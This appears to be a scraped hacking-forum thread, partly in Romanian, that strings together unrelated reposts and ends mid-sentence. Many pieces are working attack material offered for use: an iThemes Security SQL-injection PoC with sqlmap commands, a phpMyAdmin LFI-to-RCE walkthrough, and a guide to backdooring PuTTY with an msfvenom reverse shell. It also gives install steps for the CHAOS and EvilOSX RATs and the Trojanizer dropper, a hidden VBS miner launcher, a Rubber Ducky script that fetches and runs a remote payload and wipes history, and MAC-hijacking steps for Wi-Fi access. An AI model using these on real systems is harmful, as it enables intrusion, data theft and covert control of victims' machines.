Fi8sVrs

restul care? am cautat ceva serios zilele trecute si nimic

Project Cerium : Antivirus Open Source Antivirus For Humans How to Use clone the repo : git clone https://github.com/xedtech/ceriumav.git cd ceriumav python3 av.py Screenshots Source

WordPress iThemes Security plugin versions prior to 7.0.3 suffer from a remote SQL injection vulnerability. # Exploit Title: WordPress Plugin iThemes Security(better-wp-security) <= 7.0.2 - Authenticated SQL Injection # Date: 2018-06-25 # Exploit Author: Alirim Emini # Website: https://www.sentry.co.com/ # Vendor Homepage: https://ithemes.com/ # Software Link: https://wordpress.org/plugins/better-wp-security/ # Version/s: 7.0.2 and below # Patched Version: 7.0.3 # CVE : 2018-12636 # WPVULNDB: https://wpvulndb.com/vulnerabilities/9099 Plugin description: iThemes Security works to lock down WordPress, fix common holes, stop automated attacks and strengthen user credentials. With advanced features for experienced users, this WordPress security plugin can help harden WordPress. Description: WordPress Plugin iThemes Security(better-wp-security) before 7.0.3 allows remote authenticated users to execute arbitrary SQL commands via the 'orderby' parameter in the 'itsec-logs' page to wp-admin/admin.php. Technical details: Parameter orderby is vulnerable because backend variable $sort_by_column is not escaped. File: better-wp-security/core/admin-pages/logs-list-table.php Line 271: if ( isset( $_GET[' orderby '], $_GET['order'] ) ) { Line 272: $ sort_by_column = $_GET[' orderby ']; File: better-wp-security/core/lib/log-util.php Line 168: $query .= ' ORDER BY ' . implode( ', ', $ sort_by_column )); Proof of Concept (PoC): The following GET request will cause the SQL query to execute and sleep for 10 seconds if clicked on as an authenticated admin: http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip%2c(select*from(select(sleep(10)))a)&order=asc&paged=0 Using SQLMAP: sqlmap -u 'http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip*&order=asc&paged=0' --cookie "wordpress_b...; wordpress_logged_in_bbf...;" --string "WordPress" --dbms=MySQL --technique T --level 5 --risk 3 https://packetstormsecurity.com/files/148294/WordPress-iThemes-Security-SQL-Injection.html

jadx-gui --show-bad-code 1.app.apk

da-mi PM cu site-urile si vrei sa modifici la ele

Welcome to my next blog post. Today i want to show you some basic pentesting stuff. We will manually backdooring a PE-File, in this case the putty client. I used the following software setup: Windows 10 Pro 32 Bit Putty Stud_PE Immunity Debugger Before we are getting our hands into assembly, i want to explain what we will do. We will add a section header named .evil to our file and hijack the file‘s execution flow. At the entry point we will redirect the execution to our shellcode and after gaining our shell, the ordinary appliaction is running (putty starts). #0x01 Adding Section At first we are going to add our new section .evil to our file through Stud_PE. The following pictures are pritty self explaining I choosed a section size of 1500 Bytes which are filled with nullbytes. That‘s more than enough for our shellcode. After saving the file and load it into Immunity you can see the differences between the two files (new section .evil is spawned). And if you look at the adress of .evil you will see the following (our predifined nullbytes) -> Great! While checking our new section you may noticed, that the adresses has slighty changed. The last 4 Bytes are always nullbytes but the first 4 Bytes are changing through every reloading process of the file. 00FB0000 <-> 00250000 That‘s a kernel protection ASLR, you can find more information about this countermeasurement here. This makes some more work, but isn‘t a problem (more later). #0x02 Hijack Execution Flow Now we are looking at the entry point of our file in Immunity. The First instruction at 0x002B7FD6 is a call instruction. We are going to change the first instructions to jump into our code cave (.evil). Before changing any assembly instruction copy the ‚old‘ instructions to a text file, because we are going to resume to the application flow after executing our shellcode. Mark the first instruction and type „jmp [adress of .evil]“ in my case „jmp 0x002E3000“. After hitting enter you will see the following: Save the changes to a new file and open it in immunity. Now we are taking the first instruction with F7 and are landing in our code cave of nullbytes at the .evil adress. For our testing purpose we replace the nullbytes with nops. To do so just mark all the nullbytes of the code cave and do the following: We save the state of our registers on the top of the stack through the assembly instruction pushad && pushfd. At the end of our code cave we restore our register states with popfd and popad. So far no problems (hopefully). Now we do some math do encounter the ASLR protection. We want to restore all overwritten functions at the end of our code cave and jump right back into the „old“ execution flow. If you are looking at the entry ponit of our file, you will see that only the call instruction is missing. Without enabled ASLR we could use the saved adress from our textfile just like „call x002B8265“, but you see that the adress of the second instruction „jmp 0x002B7E6E“ has also changed… ASLR Hurray! What now? We have to determine the offset between the old adresses to calculate the new overwritten call instruction. Instead trying to explain the several locations, adresses and relations i try to show it in following pictures (if this isn‘t enough, plz tell me via twitter and i will add text sections) In the end we got the „new“ adress for our overwritten call instruction which is 0x13F8265. We place this call instruction right behind the restored registers (pushfd, pushad). Now we only need to jmp to the next ordinary instrution at the entry point via „jmp 0x01067FD8“ and the execution will flow. #0x03 Inject Shellcode Choose your favourit shellcode or generate a new one . I used following command: msfvenom -p windows/shell_reverse_tcp lhost=10.0.2.6 lport=1337 exitfunc=thread -f hex Then use the binary paste function of Immunity to replace some of our nops with the shellcode. Save the file and voila, you sucessfully backdoored a PE-File ! Ok, just one thing is missing. The shellcode of msfvenom used the WaitForSingleObject function and the default values prevent the application to execute until the shell is released. To solve this change the „DEC ESI“ code at the end of the shellcode with a nop. 0x04 PoC Start your listener and fire up the application. Thanks for reading and if you like this post, check my twitter account please! xD Source: hansesecure.de

Author: @Ambulong Security Team ChaMd5 disclose a Local File Inclusion vulnerability in phpMyAdmin latest version 4.8.1. And the exploiting of this vulnerability may lead to Remote Code Execution. In this article, we will use VulnSpy’s online phpMyAdmin environment to demonstrate the exploit of this vulnerability. VulnSpy’s online phpMyAdmin environment address: http://www.vulnspy.com/phpmyadmin-4.8.1/ Vulnerability Details 1.Line 54-63 in file /index.php: // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) && is_string($_REQUEST['target']) && ! preg_match('/^index/', $_REQUEST['target']) && ! in_array($_REQUEST['target'], $target_blacklist) && Core::checkPageValidity($_REQUEST['target']) ) { include $_REQUEST['target']; exit; } 2.Core::checkPageValidity in /libraries/classes/Core.php /** * boolean phpMyAdmin.Core::checkPageValidity(string &$page, array $whitelist) * * checks given $page against given $whitelist and returns true if valid * it optionally ignores query parameters in $page (script.php?ignored) * * @param string &$page page to check * @param array $whitelist whitelist to check page against * * @return boolean whether $page is valid or not (in $whitelist or not) */ public static function checkPageValidity(&$page, array $whitelist = []) { if (empty($whitelist)) { $whitelist = self::$goto_whitelist; } if (! isset($page) || !is_string($page)) { return false; } if (in_array($page, $whitelist)) { return true; } $_page = mb_substr( $page, 0, mb_strpos($page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } $_page = urldecode($page); $_page = mb_substr( $_page, 0, mb_strpos($_page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } return false; } Core::checkPageValidity can be bypassed by using by double encoding like %253f. Exploit An attacker can use this vulnerability to include session file to lauching a Remote Code Execution vulnerability. 1.Use username root, password toor log into phpmyadmin. Login PMA 2.Run SQL query select '<?php phpinfo();exit;?>' Login PMA 3.Get your Session ID Session ID is the item phpMyAdmin in your cookie. Login PMA 4.Include the session file http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k Login PMA Source: blog.vulnspy.com

ARPPD ARP Poisoning Defender This is a small script I have written in C to provide protection against malicious ARP attacks, changing the gateway's MAC Address in the ARP table of a victim's PC. How it works The program saves the Gateway's MAC and IP Address when started. It then scans for every incoming ARP packet to see if it has the ARP Source of the gateway's ip. It blocks these packets (without a delay, like in other ARP defending scripts) using arptables, and instantly updates the ARP table to match the gateway's IP and MAC. It keeps the attacker's MAC address blocked for receiving ARP packets for 5 minutes. When the program exists, it allows all MAC addresses to send ARP packets again (to the PC running the script), as well as flushing the ARP table. Cross Platform For now, the script only works on linux. I will try to release a win64 version ASAP. Installation and build ARPPD needs arptables to run, so just install it: sudo apt-get install arptables There's a pre-built executable in the builds folder, or build it yourself: To build: Run compile_arppd_linux OR Go in the main directory Run: gcc -o builds/defender-win64 src-win64/defender.c -lpcap -pthread Malicious ARP Packets When the ARPPD will detect a malicious ARP Packet, it will look like this: Video Download: ARPPD-master.zip or git clone https://github.com/Prodicode/ARPPD.git Source

CHAOS allow generate payloads and control remote Windows systems. Disclaimer This project was created only for learning purpose. THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM. Features Reverse Shell Download File Upload File Screenshot Keylogger Persistence Open URL Remotely Get Operating System Name Run Fork Bomb Tested On Kali Linux - ROLLING EDITION How To Use # Install dependencies (You need Golang and UPX package installed) $ apt install golang xterm git upx-ucl -y # Clone this repository $ git clone https://github.com/tiagorlampert/CHAOS.git # Get and install external imports (requirement to screenshot) $ go get github.com/kbinani/screenshot && go get github.com/lxn/win $ go install github.com/kbinani/screenshot && go install github.com/lxn/win # Maybe you will see the message "package github.com/lxn/win: build constraints exclude all Go files". # It's occurs because the libraries are to windows systems, but it necessary to build the payload. # Go into the repository $ cd CHAOS # Run $ go run CHAOS.go Screenshot (outdated) Video Source

TROJANIZER Version release : v1.1 (Stable) Author : pedro ubuntu [ r00t-3xp10it ] Codename: Troia_Revisited Distros Supported : Ubuntu, Kali, Mint, Parrot OS Suspicious-Shell-Activity (SSA) RedTeam develop @2017 FRAMEWORK DESCRIPTION The Trojanizer tool uses WinRAR (SFX) to compress the two files input by user, and transforms it into an SFX executable(.exe) archive. The sfx archive when executed it will run both files (our payload and the legit appl at the same time). To make the archive less suspicious to target at execution time, trojanizer will try to replace the default icon(.ico) of the sfx file with a user-selected one, and supress all SFX archive sandbox msgs (Silent=1 | Overwrite=1). 'Trojanizer will not build trojans, but from target perspective, it replicates the trojan behavior' (execute the payload in background, while the legit application executes in foreground). DEPENDENCIES (backend applications) Zenity (bash-GUIs) | Wine (x86|x64) | WinRAr.exe (installed-in-wine) "Trojanizer.sh will download/install all dependencies as they are needed" ╔────────────────────────────────────────────────────────────────────────────────────────────╗ | It is recomended to edit and config the option: SYSTEM_ARCH=[ your_sys_arch ] | | in the 'settings' file before attempting to run the tool for the first time. | ╚────────────────────────────────────────────────────────────────────────────────────────────╝ PAYLOADS (agents) ACCEPTED .exe | .bat | .vbs | .ps1 "All payloads that windows/SFX can auto-extract-execute" HINT: If sellected 'SINGLE_EXEC=ON' in the settings file, then trojanizer will accept any kind of extension to be inputed. LEGIT APPLICATIONS ACCEPTED (decoys) .exe | .bat | .vbs | .ps1 | .jpg | .bmp | .doc | .ppt | etc .. "All applications that windows/SFX can auto-extract-execute" Advanced Settings Trojanizer and APPL Whitelisting Bypasses Framework Screenshots Video Tutorials Trojanizer - AVG anti-virus fake installer (trojan behavior) Trojanizer - single_file_execution (not trojan behavior) Download/Install 1º - Download framework from github git clone https://github.com/r00t-3xp10it/trojanizer.git 2º - Set files execution permitions cd trojanizer sudo chmod +x *.sh 3º - config framework nano settings 4º - Run main tool sudo ./Trojanizer.sh Source

While fuzzing is known to be a powerful mechanism for fingerprinting and enumerating bugs within hardware and software systems, the application of this technique to wireless systems remains nontrivial due to fragmented and siloed tools. Join us as we cover wireless fuzzing fundamentals and introduce a new tool to unify the approach across protocols, radios, and drivers. About the Speakers Matt Knight Matt Knight (@embeddedsec) is a center and left wing for the San Francisco Desert Owls ice hockey team. When his schedule allows he moonlights as a software engineer and security researcher, where he explores the boundaries between software, hardware, and wireless systems. With specific interests in RF networks and physical layers, he notably reverse engineered the LoRa PHY based on blind signal analysis. Matt holds a BE in Electrical Engineering from Dartmouth College. Ryan Speers Ryan Speers is a security researcher and developer who enjoys embedded systems, low-power radio protocols, and reversing proprietary systems. He has worked in offensive and defensive roles on networks, Windows, micro controllers, and many things in-between. As co-founder at River Loop Security, he tests embedded systems for security issues, and helps clients build more secure systems. He is also Director of Research for Ionic Security where he leads system and cryptographic research. He has previously spoken at a number of security conferences, including Troopers 14, and written some articles for journals ranging from peer-reviewed academic publications to PoC link: https://www.troopers.de/troopers18/agenda/rgdyd3/

Hidden.vbs Set WshShell = CreateObject("WScript.Shell") WshShell.Run chr(34) & "miner.bat" & Chr(34), 0 Set WshShell = Nothing Miner.bat minergate-cli --user email@gmail.com --xmr 1 Minergate https://minergate.com Source: fsecu

AlphaBay Market was by far the largest and most prolific provider of cyber crime and fraudulent services in the world prior to its seizure by the FBI on July 4, 2017. While the Tor-based marketplace was most famous for the sale of narcotics, firearms, and stolen goods, AlphaBay’s forum was the epicenter of the English-speaking cyber criminal community. During the site’s tenure, it provided a rich source of intelligence on the tactics, techniques, and operations of cyber criminal groups targeting a wide range of corporations and selling exfiltrated data through the marketplace securely and anonymously. This included visibility into the attack cycle, AlphaBay operating as a bridge between the English and Russian language cyber criminal communities, and the likely role of AlphaBay’s administrators in cryptocurrency market manipulation on a large scale. This presentation will discuss iDefense’s research into AlphaBay Market as a case study on how in-depth analysis of underground communities can contribute to an organization’s security posture. It will provide a detailed discussion of the tradecraft and methodologies used for underground intelligence, such as the use of undercover personas and how to apply social engineering techniques to gain additional intelligence. It will also discuss the strengths and weaknesses of such an approach and the risks associated with cyber underground collection. Finally, the case study will present lessons learned from engagement and analysis of criminal underground communities and how attendees can integrate cyber underground intelligence into their threat intelligence program. Christy Quinn (@ChristyQuinn), Security Specialist – Cyber Threat Intelligence, iDefense – Accenture Security

EvilOSX A pure python, post-exploitation, RAT (Remote Administration Tool) for macOS / OSX. Features Emulate a simple terminal instance Undetected by anti-virus (OpenSSL AES-256 encrypted payloads, HTTPS communication) Multi-threaded No client dependencies (pure python) Persistent Simple extendable module system Retrieve Chrome passwords Retrieve iCloud tokens and contacts Phish for iCloud passwords via iTunes Download and upload files Take a picture using the webcam Record microphone input iTunes iOS backup enumeration Retrieve or monitor the clipboard Retrieve browser history (Chrome and Safari) Attempt to get root via local privilege escalation Auto installer, simply run EvilOSX on your target and the rest is handled automatically How To Use The server side requires python3 to run (probably already installed on your system). # Clone or download this repository $ git clone https://github.com/Marten4n6/EvilOSX # Install dependencies required by the server $ sudo pip3 install -r requirements.txt # Go into the repository $ cd EvilOSX # Build a launcher to infect your target $ python builder.py # Start listening for connections $ python start.py # Lastly, run the built launcher on your target Because payloads are created unique to the target system (automatically by the server), the server must be running when any client connects for the first time. Screenshots Motivation This project was created to be used with my Rubber Ducky, here's the simple script: REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX REM Also see https://ducktoolkit.com/vidpid/ DELAY 1000 GUI SPACE DELAY 500 STRING Termina DELAY 1000 ENTER DELAY 1500 REM Kill all terminals after x seconds STRING screen -dm bash -c 'sleep 6; killall Terminal' ENTER STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear ENTER Takes about 10 seconds to backdoor any unlocked Mac, which is...... nice Terminal is spelt that way intentionally, on some systems spotlight won't find the terminal otherwise. To bypass the keyboard setup assistant make sure you change the VID&PID which can be found here. Aluminum Keyboard (ISO) is probably the one you are looking for. Source

███████╗██╗ ██╗ █████╗ ██████╗ ██████╗ ██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗ ██╔════╝██║ ██║██╔══██╗██╔══██╗██╔═══██╗██║ ██║ ██╔══██╗██╔═══██╗╚██╗██╔╝ ███████╗███████║███████║██║ ██║██║ ██║██║ █╗ ██║█████╗██████╔╝██║ ██║ ╚███╔╝ ╚════██║██╔══██║██╔══██║██║ ██║██║ ██║██║███╗██║╚════╝██╔══██╗██║ ██║ ██╔██╗ ███████║██║ ██║██║ ██║██████╔╝╚██████╔╝╚███╔███╔╝ ██████╔╝╚██████╔╝██╔╝ ██╗ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═════╝ ╚═════╝ ╚══╝╚══╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ Lightweight Hypervisor-Based Kernel Protector Introduction of Shadow-Box Shadow-box is a security monitoring framework for operating systems using state-of-the-art virtualization technologies. Shadow-box has a novel architecture inspired by a shadow play. We made Shadow-box from scratch, and it is primarily composed of a lightweight hypervisor and a security monitor. The lightweight hypervisor, Light-box, efficiently isolates an OS inside a guest machine and projects static and dynamic kernel objects of the guest into the host machine so that our security monitor in the host can investigate the projected images. The security monitor, Shadow-Watcher, places event monitors on static kernel elements and tests security of dynamic kernel elements. Shadow-box manipulates address translations from the guest physical address to the host physical address in order to exclude unauthorized accesses to the host and the hypervisor spaces. In that way, Shadow-box can properly introspect the guest operating system and mediate all accesses, even when the operating system is compromised. Videos: Architecture of Shadow-Box We explain how we designed the Light-box and the Shadow-watcher. It is designed to support a lightweight and practical security monitoring framework using virtualization technologies. We developed a security monitoring framework, Shadow-box that keeps an OS safe by filtering out unauthorized accesses to important kernel elements and defending the integrity of kernel elements periodically. Shadow-box relies upon its two subparts: a lightweight hypervisor and a security monitor. The lightweight hypervisor, Light-box, efficiently isolates an OS inside a guest machine and projects static and dynamic kernel objects of the guest into the host machine, so that our security monitor in the host can investigate the projected images. The security monitor, Shadow-watcher, places event monitors on static kernel elements and tests security of dynamic kernel elements. Running inside the host, it can test the security of the guest without malicious interference even when the guest OS is compromised. If you want to know more about Shadow-box, please see my presentation and paper at Black Hat Asia 2017 and HITBSecConf 2017. How to Build How to Use Download: shadow-box-for-x86-master.zip or git clone https://github.com/kkamagui/shadow-box-for-x86.git Source

Facebook-Video-Downloader Version 1.0.0 Facebook Video Downloader (CLI) For Linux Systems Coded in PHP How To Use: git clone https://github.com/Tuhinshubhra/Facebook-Video-Downloader cd Facebook-Video-Downloader php fb.php enter URL for example ( https://www.facebook.com/cctvcom/videos/1410869539034155/ ) enter File Name DONE Mirror: fb.php <?php function curl($url) { $curl = curl_init($url); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13"); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($curl); curl_close($curl); return $content; } system("clear"); echo " _____ _____ _____ _____ ____ _____ _____ ____ _____ _ _ _ _____ __ _____ _____ ____ _____ _____ | __| __ | | | | | \| __| | | \| | | | | | | | | | _ | \| __| __ | | __| __ -| | | |- -| | | __| | | | | | | | | | | | | | |__| | | | | | __| -| |__| |_____| \___/|_____|____/|_____|_____| |____/|_____|_____|_|___|_____|_____|__|__|____/|_____|__|__| VERSION 1.0.0 CREATED BY R3D#@X0r "; echo "\n\n"; echo "[#] Enter Video URL (https://www.facebook.com/user/video/id) : "; $v = trim(fgets(STDIN, 1024)); echo "\n\n[#] Enter Video Name To Save As : "; $name = trim(fgets(STDIN, 1024)); $url = str_replace('www', 'mbasic', $v); $s = curl($url); //echo $s; $vurl = preg_match('/<a href=\"\/video_redirect\/\?src\=(.*?)\"/ims', $s, $matches) ? $matches[1] : null; $vu = urldecode($vurl); echo "\n\n[+] Downloading... \n\n\n"; $d = 'wget -O "' . $name . '.mp4" --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6" "' . $vu . '" -q --show-progress'; system($d); echo "\n\n[+] Done.. Saved As : " . $name . ".mp4\n\n"; exit(0); ?> Source

Apple is worried about the battery drain from background cryptocurrency mining. [ Apple recently announced new restrictions on the use of cryptocurrencies on iPhones and iPads, a change first noticed by Apple Insider on Monday. "Apps may not mine for cryptocurrencies unless the processing is performed off device," Apple's app store guidelines for iOS now say. This requirement was absent from the same document just a few weeks ago. Apple's new policy is apparently motivated in part by concerns that cryptocurrency mining could drain the batteries of mobile devices. "Apps, including any third party advertisements displayed within them, may not run unrelated background processes, such as cryptocurrency mining," the policy states. Websites have been battling this issue for months: people submitting scammy ads to ad networks that hijack the user's CPU to mine cryptocurrency and send the profits back to the admaker. YouTube was briefly serving up these ads before Google noticed the problem and banned the ads. But Apple's new policy seems to go beyond obviously abusive cases of surreptitious cryptocurrency mining. The guidelines ban any on-device mining—even if users deliberately download an app whose explicit purpose is to mine for cryptocurrency. Devices running iOS are not likely to qualify as good mining hardware anyway. Bitcoin cryptocurrency mining has long been dominated by custom ASIC chips. Some other cryptocurrencies are designed to be ASIC-resistant, but even these are predominantly mined on high-end graphics cards with ample processing power and memory. An iPhone or iPad doesn't offer very much raw computing power per dollar, so it probably wouldn't make sense for someone to buy an iPhone or iPad to use as a mining device. Apple guidelines also now state that cryptocurrency apps "may not offer currency for completing tasks, such as downloading other apps, encouraging other users to download, posting to social networks." Apple's new policy takes effect at a time of growing concern over scammy behavior in the cryptocurrency world. Google and Facebook both banned cryptocurrency ads from their ad networks earlier this year. And the Securities and Exchange Commission has become increasingly aggressive about shutting down initial coin offerings that are fraudulent or otherwise break the law. Via arstechnica.com

Free Wifi This short tutorial describes a few methods for gaining access to the Internet, a basic human right, from public wireless networks. This tutorial has been tested on Mac and a Raspberry Pi. It should generally work on Linux, and hasn't been tested on Windows. Preparation Make sure you do this step before you are stuck without Internet access: Install Python pip On Linux, install Python Developer package, a dependency for the netifaces package. Ubuntu $ sudo apt-get install python-dev Fedora $ sudo dnf install python-devel Note: For Centos, substitute dnf with yum Make a copy of this repository and install dependencies for the script: $ git clone https://github.com/kylemcdonald/FreeWifi $ cd FreeWifi && sudo pip install -r requirements.txt How to get additional time If you had free internet access but your time has run out, the first thing to try is open an incognito/private window. Here are instructions for a few browsers: Chrome (mobile and desktop) Safari for iOS Safari for Mac Microsoft Edge An incognito/private window will temporarily clear any cookies that may have been used for tracking how much time you spent online, making you look like a "new user" and allowing you to log into the wireless portal again. Unfortunately, most systems track MAC addresses instead of cookies. A MAC address is a unique identifier assigned to every network interface. This means you need to get a new MAC address to get additional time. Fortunately, MAC addresses can be changed in software, without swapping the hardware. The spoof-mac command line utility makes this easy by entering sudo spoof-mac randomize Wi-Fi. If the command fails to run, try entering spoof-mac list --wifi to check what the name of your wireless device is first, and use that manually. After randomizing your MAC, try logging into the wireless portal again. When you're done using the Internet, run sudo spoof-mac reset Wi-Fi to reset your MAC address. Note that MAC address spoofing may be interpreted as an illegal activity depending on why you do it. In some cases it is certainly not illegal: recent mobile operating systems like iOS 8+ and Android 6+ automatically randomize their MAC address when searching for wireless networks to avoid being tracked. But when Aaron Swartz liberated JSTOR, MAC address spoofing was claimed as a signal of intention to commit a crime. How to get free access If the network is open, but you can't get access for some reason, you can also try spoofing the MAC address of a device that is already using the network. To the router, your device and the other device will look like one device. This can cause some minor problems if they interrupt each other, but for light browsing it usually works out fine. To find the MAC addresses of other devices using the network, first you need to connect to the network. You don't need to have Internet access, just a connection. First, on Mac OS run the command sudo chmod o+r /dev/bpf* once to make sure you can sniff wireless data (you need to do this again if you restart your computer). Then run the command python wifi-users.py. You should see a progress bar immediately: Available interfaces: en0 Interface: en0 SSID: nonoinflight Available gateways: en0 Gateway IP: 10.0.1.1 Gateway MAC: 00:e0:4b:22:96:d9 100%|██████████████████████████| 1000/1000 [00:46<00:00, 21.46it/s] Total of 5 user(s): 27:35:96:a8:66:7f 6359 bytes 36:fe:83:9c:35:eb 9605 bytes 65:01:3c:cc:20:e8 17306 bytes 8c:6f:11:2c:f0:ee 20515 bytes 0a:4f:b2:b8:e8:56 71541 bytes If there isn't much traffic on the network, it might take longer. If it's taking too long, type CTRL-C to cancel the sniffing and print whatever results are available. Finally, we want to spoof one of these MAC addresses. For example, in this case we would enter sudo spoof-mac set 0a:4f:b2:b8:e8:56 Wi-Fi to try spoofing the address with the most traffic (they probably have a connection). After running that command, try to access the Internet. If you don't have a connection, try the next MAC in the list. If your Internet connection drops out while using this MAC address, try disconnecting and reconnecting to the wireless network. Note that the original user of the MAC you copied may experience these same connection drop outs if you are both actively using the network. How it works wifi-users.py uses tcpdump to collect wireless packets. Then we look through these packets for any hints of the MAC address (BSSID) of our wireless network. Finally, we look for data packets that mention a user's MAC as well as the network BSSID (or the network gateway), and take note of that MAC using some amount of data. Then we sort the user's MACs by the total amount of data and print them out. Instead of sniffing wireless traffic, in some situations you can also use the command arp -a to get a list of MAC addresses of devices on the wireless network. Then you can either use spoof-mac to copy the address, or use ifconfig directly on Linux and OSX. For the specifics of using ifconfig look at the implementations of set_interface_mac inside SpoofMac's interfaces.py. This repository is dedicated to Lauren McCarthy, who has taught me the most about the art of getting a good deal. Source

@sergiu4995 https://github.com/kylemcdonald/FaceTracker edit: poti incerca Face Substitution Kyle McDonald References: https://www.auduno.com/clmtrackr/examples/facesubstitution.html https://github.com/kylemcdonald http://kylemcdonald.net/

The IT security researchers at Qihoo 360 Total Security have discovered a new malware aiming at stealing cryptocurrencies, including Bitcoin and Ethereum, from the computer system of unsuspected users. Dubbed ClipboardWalletHijacker by researchers; the malware is targeting at Windows-based devices and is currently installed on over 300,000 devices. As indicated by its name the malware monitors clipboard activity to identify what kind of cryptocurrencies the victim has stored in their wallet – In case the malware finds Bitcoin and Ethereum addresses it replaces them with the one used by cybercriminals behind the campaign. So far ClipboardWalletHijacker has stolen over 5 Bitcoin while its last activity was detected on June 12th, 2018, indicating that malware is still active and stealing funds. Recently, we have found that a lot of CryptoMiner Trojans are using this technique to steal victims’ cryptocurrencies. “We strongly recommend users to enable antivirus software while installing new applications”, said the company in their blog post. ClipboardWalletHijacker’s ability to replace wallet address by monitoring clipboard activity is not new, previously, CryptoShuffler Trojan was found following the same method to steal mainstream cryptocurrencies including Dash, Monero, Ethereum, Bitcoin, and Zcash, etc. In March this year, researchers spotted ComboJack malware which is actively stealing cryptocurrency by modifying victims addresses. Moreover, Evrial and Coinbitclip trojan was also caught monitoring clipboard activities of their victims to steal funds by replacing their wallet addresses. If you are investing in cryptocurrency make sure your system is secure and funds are properly protected. Additionally, cryptocurrency users are advised to avoid using online wallets to store their funds and move to hardware wallets. Here is a list of 5 secure Bitcoin wallets which you can trust. In January this year, researchers warned Internet proxy users to watch out for Tor Proxy since its owners were found replacing Bitcoin payment addresses to divert payments from ransomware victims to their own wallets. Via hackread.com

Scapy is an incredible tool when it comes to playing with the network. As it is written on its official website, Scapy can replace a majority of network tools such as nmap, hping and tcpdump. One of the features offered by Scapy is to sniff the network packets passing through a computer’s NIC. Below is a small example: from scapy.all import * interface = "eth0" def print_packet(packet): ip_layer = packet.getlayer(IP) print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst)) print("[*] Start sniffing...") sniff(iface=interface, filter="ip", prn=print_packet) print("[*] Stop sniffing") This little sniffer displays the source and the destination of all packets having an IP layer: $ sudo python3 sniff_main_thread.py [*] Start sniffing... [!] New Packet: 10.137.2.30 -> 10.137.2.1 [!] New Packet: 10.137.2.30 -> 10.137.2.1 [!] New Packet: 10.137.2.1 -> 10.137.2.30 [!] New Packet: 10.137.2.1 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 ^C[*] Stop sniffing It will continue to sniff network packets until it receives a keyboard interruption (CTRL+C). Now, let’s look at a new example: from scapy.all import * from threading import Thread from time import sleep class Sniffer(Thread): def __init__(self, interface="eth0"): super().__init__() self.interface = interface def run(self): sniff(iface=self.interface, filter="ip", prn=self.print_packet) def print_packet(self, packet): ip_layer = packet.getlayer(IP) print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst)) sniffer = Sniffer() print("[*] Start sniffing...") sniffer.start() try: while True: sleep(100) except KeyboardInterrupt: print("[*] Stop sniffing") sniffer.join() This piece of code does exactly the same thing as the previous one except that this time the sniff function is executed inside a dedicated thread. Everything works well with this new version except when it comes to stopping the sniffer: $ sudo python3 sniff_thread_issue.py [*] Start sniffing... [!] New Packet: 10.137.2.30 -> 10.137.2.1 [!] New Packet: 10.137.2.30 -> 10.137.2.1 [!] New Packet: 10.137.2.1 -> 10.137.2.30 [!] New Packet: 10.137.2.1 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 ^C[*] Stop sniffing ^CTraceback (most recent call last): File "sniff_thread_issue.py", line 25, in <module> sleep(100) KeyboardInterrupt During handling of the above exception, another exception occurred: Traceback (most recent call last): File "sniff_thread_issue.py", line 28, in <module> sniffer.join() File "/usr/lib/python3.5/threading.py", line 1054, in join self._wait_for_tstate_lock() File "/usr/lib/python3.5/threading.py", line 1070, in _wait_for_tstate_lock elif lock.acquire(block, timeout): KeyboardInterrupt ^CException ignored in: <module 'threading' from '/usr/lib/python3.5/threading.py'> Traceback (most recent call last): File "/usr/lib/python3.5/threading.py", line 1288, in _shutdown t.join() File "/usr/lib/python3.5/threading.py", line 1054, in join self._wait_for_tstate_lock() File "/usr/lib/python3.5/threading.py", line 1070, in _wait_for_tstate_lock elif lock.acquire(block, timeout): KeyboardInterrupt When CTRL+C is pressed, a SIGTERM signal is sent to the process executing the Python script, triggering its exit routine. However, as said in the 